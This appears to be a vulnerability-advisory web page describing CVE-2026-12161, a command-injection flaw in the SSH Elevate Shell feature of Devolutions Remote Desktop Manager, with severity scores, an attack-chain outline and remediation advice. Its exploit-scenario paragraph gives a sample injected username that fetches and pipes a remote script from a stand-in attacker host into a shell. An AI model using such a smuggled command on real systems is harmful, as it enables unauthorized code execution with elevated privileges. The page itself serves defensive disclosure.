Skip to main content

Remote Desktop Manager CVE-2026-12161

| EUVDEUVD-2026-37023 HIGH
OS Command Injection (CWE-78)
2026-06-15 DEVOLUTIONS GHSA-w469-xxf5-q946
8.8
CVSS 3.1 · Vendor: DEVOLUTIONS
Share

Severity by source

Vendor (DEVOLUTIONS) PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
8.0 HIGH

Requires authenticated RDM user with shared-entry edit rights (PR:L) and a second user clicking Elevate Shell (UI:R); injection is straightforward over the network with full C/I/A impact on the target host.

3.1 AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (DEVOLUTIONS).

CVSS VectorVendor: DEVOLUTIONS

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Analysis Generated
Jun 16, 2026 - 17:22 vuln.today
CVSS changed
Jun 16, 2026 - 17:22 NVD
8.8 (HIGH)
CVE Published
Jun 15, 2026 - 23:55 cve.org
UNKNOWN (no severity yet)

DescriptionCVE.org

Improper input validation in the SSH Elevate Shell feature in Devolutions Remote Desktop Manager 2026.2.7 allows an authenticated user with permission to create or modify a shared SSH entry to execute arbitrary commands on a remote SSH host using stored elevation credentials via a crafted alternate username and user interaction with the Elevate Shell action.

AnalysisAI

OS command injection in the SSH Elevate Shell feature of Devolutions Remote Desktop Manager up to 2026.2.7 lets an authenticated user who can create or modify a shared SSH entry execute arbitrary commands on remote SSH hosts by smuggling shell metacharacters through a crafted alternate username, abusing stored elevation credentials they would not otherwise possess. No public exploit identified at time of analysis and EPSS is low (0.16%, 5th percentile), but the privilege-escalation angle - turning shared-entry write access into code execution under another user's sudo/elevation context - makes this attractive for insider or post-compromise abuse.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain RDM account with shared-entry edit rights
Delivery
Inject shell metacharacters into alternate-username of shared SSH entry
Exploit
Wait for privileged user to run Elevate Shell
Execution
Stored elevation credentials supplied to crafted command
Persist
Arbitrary commands execute on remote SSH host under elevated context
Impact
Pivot or persist using new foothold

Vulnerability AssessmentAI

Exploitation Attacker must already be an authenticated RDM user whose role grants permission to create or modify a shared SSH entry that uses the Elevate Shell feature with stored elevation credentials. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Signals diverge: the CVSS 8.8 vector (AV:N/AC:L/PR:L/UI:N) paints this as easy network attack, but the description explicitly requires victim user interaction (clicking Elevate Shell) and shared-entry edit rights, which is closer to PR:L/UI:R - the official UI:N appears inconsistent with the prose and likely overstates severity. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A junior operator with edit rights to a shared SSH entry in a corporate RDM vault inserts shell metacharacters into the entry's alternate-username field (e.g., `bob;curl attacker/x|sh`); when a senior admin later runs Elevate Shell against that host, RDM supplies the stored root elevation password and the injected payload runs as the elevated user on the target server. No public exploit identified at time of analysis, but the attack is straightforward given the low AC and the well-understood command-injection class.
Remediation Upgrade Remote Desktop Manager to the fixed release referenced in Devolutions advisory DEVO-2026-0018 (https://devolutions.net/security/advisories/DEVO-2026-0018/); the input data does not include an exact fixed build number, so consult the advisory for the precise version above 2026.2.7. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Audit all user permissions for shared SSH entry creation and modification in RDM; restrict these capabilities to administrators only and document current version inventory across all deployments. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2024-6057 CRITICAL
9.8 Jun 17

Improper authentication in the vault password feature in Devolutions Remote Desktop Manager 2024.1.31.0 and earlier allo

CVE-2023-6593 CRITICAL
9.8 Dec 12

Client side permission bypass in Devolutions Remote Desktop Manager 2023.3.4.0 and earlier on iOS allows an attacker tha

CVE-2023-5766 CRITICAL
9.8 Nov 01

A remote code execution vulnerability in Remote Desktop Manager 2023.2.33 and earlier on Windows allows an attacker to r

CVE-2023-5765 CRITICAL
9.8 Nov 01

Improper access control in the password analyzer feature in Devolutions Remote Desktop Manager 2023.2.33 and earlier on

CVE-2023-4373 CRITICAL
9.8 Aug 21

Inadequate validation of permissions when employing remote tools and macros within Devolutions Remote Desktop Manager ve

CVE-2024-11621 HIGH
8.8 Feb 10

Missing certificate validation in Devolutions Remote Desktop Manager on macOS, iOS, Android, Linux allows an attacker to

CVE-2022-4287 HIGH
8.8 Dec 21

Authentication bypass in local application lock feature in Devolutions Remote Desktop Manager 2022.3.26 and earlier on W

CVE-2022-3641 HIGH
8.8 Dec 12

Elevation of privilege in the Azure SQL Data Source in Devolutions Remote Desktop Manager 2022.3.13 to 2022.3.24 allows

CVE-2021-42098 HIGH
8.8 Oct 18

An incomplete permission check on entries in Devolutions Remote Desktop Manager before 2021.2.16 allows attackers to byp

CVE-2025-1193 HIGH
8.1 Feb 10

Improper host validation in the certificate validation component in Devolutions Remote Desktop Manager on 2024.3.19 and

CVE-2024-12149 HIGH
8.1 Dec 04

Incorrect permission assignment in temporary access requests component in Devolutions Remote Desktop Manager 2024.3.19.0

CVE-2023-6288 HIGH
7.8 Dec 06

Code injection in Remote Desktop Manager 2023.3.9.3 and earlier on macOS allows an attacker to execute code via the DYLI

Share

CVE-2026-12161 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy